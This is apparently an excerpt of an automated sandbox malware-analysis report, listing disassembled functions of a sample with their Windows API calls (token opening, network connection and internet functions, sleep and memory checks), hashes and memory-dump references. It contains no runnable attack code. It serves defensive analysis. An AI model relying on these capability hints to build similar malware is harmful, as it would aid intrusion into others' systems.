                                                                                                                    • Opcode Fuzzy Hash: 6ee771f1adfaf610c9c22f638aedf55ef73414fbbd78b30db1d36b62209a0538
                                                                                                                    • Instruction Fuzzy Hash: 2CE03932504244EEDB265FA4FC0DBD87B14EB06332F148366FA69480F187728984DB22
                                                                                                                    Function 00378712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0037871B
                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,003782E6), ref: 00378722
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003782E6), ref: 0037872F
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,003782E6), ref: 00378736
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    • Opcode ID: 4e41a2bc7ff037c6ca0747ed542a01676294d29097a09995ed8129efa9d7e10d
                                                                                                                    • Instruction ID: a7685d441849b8dbc292007877b767d98edc176265a75cf2c768e9a95b44db0c
                                                                                                                    • Opcode Fuzzy Hash: 4e41a2bc7ff037c6ca0747ed542a01676294d29097a09995ed8129efa9d7e10d
                                                                                                                    • Instruction Fuzzy Hash: 92E0863A6512119FD7715FF09D0CB973BACEF52791F158828B28AC9080DA388441C750
                                                                                                                    Function 00326240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %;
                                                                                                                    • API String ID: 0-3184110943
                                                                                                                    • Opcode ID: bf0667aaa4cae4f9bd706fbb05731558e1485225976695269933b575b3b7bc13
                                                                                                                    • Instruction ID: d77c86e1126505d0812831256e7f2d0327639c414d342c8650dd6a1ee922f8e0
                                                                                                                    • Opcode Fuzzy Hash: bf0667aaa4cae4f9bd706fbb05731558e1485225976695269933b575b3b7bc13
                                                                                                                    • Instruction Fuzzy Hash: 96B1D575900129DBCF16EF98E8829FEB7B9FF44310F104126E952AB1A1DB349E85CB91
                                                                                                                    Function 0039AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __itow_s
                                                                                                                    • String ID: xb>$xb>
                                                                                                                    • API String ID: 3653519197-4208917643
                                                                                                                    • Opcode ID: ada51f48e6e9d4c2c44d7c727d5dd0443d16e79c1cafd698150c1868f46397fe
                                                                                                                    • Instruction ID: 4940e52db00f47f513cefd456b10c9a4b9cd36a438a8e762f8bd41878bfad982
                                                                                                                    • Opcode Fuzzy Hash: ada51f48e6e9d4c2c44d7c727d5dd0443d16e79c1cafd698150c1868f46397fe
                                                                                                                    • Instruction Fuzzy Hash: D8B17F70A00209EFCF16DF54D991EBABBB9FF59300F148559F9459B292EB30E941CB90
                                                                                                                    Function 0038AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0033FC86: _wcscpy.LIBCMT ref: 0033FCA9
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • __wcsnicmp.LIBCMT ref: 0038B02D
                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0038B0F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                    • String ID: LPT
                                                                                                                    • API String ID: 3222508074-1350329615
                                                                                                                    • Opcode ID: 461355c1eaef5826d12bca88906b54e436cbbd109a391c61758cb0c4d550928b
                                                                                                                    • Instruction ID: 41e469074c1a872bfece4d844eab172f4c9d5171f2aa2c3efc89cdcec8c8dc90
                                                                                                                    • Opcode Fuzzy Hash: 461355c1eaef5826d12bca88906b54e436cbbd109a391c61758cb0c4d550928b
                                                                                                                    • Instruction Fuzzy Hash: 0161A175A00219AFCB16EF94D895EAEF7B8EF09310F15409AF916AF391D730AE40CB50
                                                                                                                    Function 00332957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00332968
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00332981
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                    • Opcode ID: 013718c710646cf951d43e4a5c65c19d7b23a6324befbaf39fc64caf9775c976
                                                                                                                    • Instruction ID: a7a4ad5d621498c90198dbd7f545833f968d253233eaeff57bb77d4233273048
                                                                                                                    • Opcode Fuzzy Hash: 013718c710646cf951d43e4a5c65c19d7b23a6324befbaf39fc64caf9775c976
                                                                                                                    • Instruction Fuzzy Hash: BC5146724087549BD321EF10E886BAFBBECFF85354F42885DF2D8850A1DB319529CB66
                                                                                                                    Function 00389734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324F0B: __fread_nolock.LIBCMT ref: 00324F29
                                                                                                                    • _wcscmp.LIBCMT ref: 00389824
                                                                                                                    • _wcscmp.LIBCMT ref: 00389837
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                                                    • String ID: FILE
                                                                                                                    • API String ID: 4029003684-3121273764
                                                                                                                    • Opcode ID: ddf10221174f93846986527c1dd5b27d574346ed5784317ef60620c1f448b247
                                                                                                                    • Instruction ID: 66959cb53548432b9bf47eefc858226b4767b7de168b638853385e47994f4759
                                                                                                                    • Opcode Fuzzy Hash: ddf10221174f93846986527c1dd5b27d574346ed5784317ef60620c1f448b247
                                                                                                                    • Instruction Fuzzy Hash: FA41AB71A0031ABADF22AFA5DC45FEFB7BDDF85710F0104AAF904BB181D671A9058B61
                                                                                                                    Function 00360574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID: Dd>$Dd>
                                                                                                                    • API String ID: 1473721057-946826178
                                                                                                                    • Opcode ID: b6d0915429f57174adc4ae4599f2ea95d03d76830bf2dbd4d7cbefe16b02b135
                                                                                                                    • Instruction ID: 9605f93d538388c8c44d0ae264df54c1d4c7db507a0b53544953248b08528341
                                                                                                                    • Opcode Fuzzy Hash: b6d0915429f57174adc4ae4599f2ea95d03d76830bf2dbd4d7cbefe16b02b135
                                                                                                                    • Instruction Fuzzy Hash: 38512278A08751CFD766CF19D580A1ABBF2BB99390F55881CE9858B361D731EC81CF42
                                                                                                                    Function 0039258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0039259E
                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003925D4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                    • String ID: |
                                                                                                                    • API String ID: 1413715105-2343686810
                                                                                                                    • Opcode ID: 43a38c98b4deb77730628341fe2f9fc91fd245ac3cd7bf007ff024e749a7894d
                                                                                                                    • Instruction ID: 5f60966d91ccac9777880ac1e3b2cba1de869c592fdc6ca3a9fb941135233085
                                                                                                                    • Opcode Fuzzy Hash: 43a38c98b4deb77730628341fe2f9fc91fd245ac3cd7bf007ff024e749a7894d
                                                                                                                    • Instruction Fuzzy Hash: 25310771800119ABCF12EFA5DC85EEEBFB8FF08350F104059F955AA162EB315956DB60
                                                                                                                    Function 003A7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 003A7B61
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003A7B76
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: '
                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                    • Opcode ID: 1c3c84615a5b51913922ecd48387bc3868e76eb1eef5bd2f373b95a0ad560129
                                                                                                                    • Instruction ID: 9adac09d3905f183406dc4bc6b4643b026f9555bf8ff83a7fa4961a302b6b088
                                                                                                                    • Opcode Fuzzy Hash: 1c3c84615a5b51913922ecd48387bc3868e76eb1eef5bd2f373b95a0ad560129
                                                                                                                    • Instruction Fuzzy Hash: FC411974A05209AFDB15CF65C9C1BEABBB9FF09300F11016AE904EB391D770A951CFA0
                                                                                                                    Function 003A6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 003A6B17
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003A6B53
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                    • Opcode ID: 09b1220e3e2fb5384eb01cb78e20a557e5498e4eee15140f55864fe57e5178c0
                                                                                                                    • Instruction ID: daad737f22e3621ffed56517bb0e461f22dab8e4fa1b2513bc750c7a36d25033
                                                                                                                    • Opcode Fuzzy Hash: 09b1220e3e2fb5384eb01cb78e20a557e5498e4eee15140f55864fe57e5178c0
                                                                                                                    • Instruction Fuzzy Hash: 59319E71200604AEDB129F69CC81BFB73ADFF49760F158619F9AAD7190DB31AC91CB60
                                                                                                                    Function 003828A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00382911
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0038294C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                    • Opcode ID: 7e5f882e98192d234a9f46e9ee15042d59dcca9a3400ad20cf7d854763d4fd12
                                                                                                                    • Instruction ID: 71c1ba954c8f21096147b2aba43876efba9cba48b6ee1e800a2924860faf45fa
                                                                                                                    • Opcode Fuzzy Hash: 7e5f882e98192d234a9f46e9ee15042d59dcca9a3400ad20cf7d854763d4fd12
                                                                                                                    • Instruction Fuzzy Hash: 5B31F731A003059FDF26EF58C845BAFBBF8EF05350F150099ED85AA1A0D7709950CB11
                                                                                                                    Function 003A66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003A6761
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A676C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                    • Opcode ID: d3606b4197b33486d62715c2482030e387c870e25f8bcd012c9f4e173fd12ae1
                                                                                                                    • Instruction ID: fffa60b4b2fdf3c13b96c38cd3b6a38c2883fe5ba3e007c4ff095efa298826e1
                                                                                                                    • Opcode Fuzzy Hash: d3606b4197b33486d62715c2482030e387c870e25f8bcd012c9f4e173fd12ae1
                                                                                                                    • Instruction Fuzzy Hash: 0A11B675210208AFEF139F54DC81EBB376EEB56368F150125F9149B290D632DC5187A0
                                                                                                                    Function 003A6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00321D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00321D73
                                                                                                                      • Part of subcall function 00321D35: GetStockObject.GDI32(00000011), ref: 00321D87
                                                                                                                      • Part of subcall function 00321D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00321D91
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 003A6C71
                                                                                                                    • GetSysColor.USER32(00000012), ref: 003A6C8B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                    • Opcode ID: 0de0e037a07e7afa5314b400b7ebbbdcc4d318ff6dbfb4eb2474c7aa68213887
                                                                                                                    • Instruction ID: fc6d0585e0768636cca9ca96468bcf95443a92517e63ea9fe04aa5381aeef654
                                                                                                                    • Opcode Fuzzy Hash: 0de0e037a07e7afa5314b400b7ebbbdcc4d318ff6dbfb4eb2474c7aa68213887
                                                                                                                    • Instruction Fuzzy Hash: 67215972510219AFDF06DFB8CC46AFA7BA9FB09314F054628F995D2250D735E850DB60
                                                                                                                    Function 003A6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 003A69A2
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003A69B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: 27abc2313c664ffdcbc0e2f7601619bd9e0eb2e8ef769fef6220b7c4de2c794c
                                                                                                                    • Instruction ID: 0617cda29d3fb7998806bbec6637c3024fc741c41eaf7d75cc174f9f8ff681ba
                                                                                                                    • Opcode Fuzzy Hash: 27abc2313c664ffdcbc0e2f7601619bd9e0eb2e8ef769fef6220b7c4de2c794c
                                                                                                                    • Instruction Fuzzy Hash: 98116A71500208AFEB128F64DC46AEB37ADEB17378F554728F9A5961E0C731DC519B60
                                                                                                                    Function 003829AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00382A22
                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00382A41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                    • Opcode ID: 17087361f6e04094c2bb03dd30c4cc7198bdc308c6e72f9ef491665a7df1a665
                                                                                                                    • Instruction ID: a59f78def4c2962fe4ec8e06ae1362a9967183caa13063bf492f29c50b3252d8
                                                                                                                    • Opcode Fuzzy Hash: 17087361f6e04094c2bb03dd30c4cc7198bdc308c6e72f9ef491665a7df1a665
                                                                                                                    • Instruction Fuzzy Hash: C011D336901314AFCB3BEB98D944B9B73BCAF46304F0641A1E855EB290DB34AD06C791
                                                                                                                    Function 003921D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0039222C
                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00392255
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
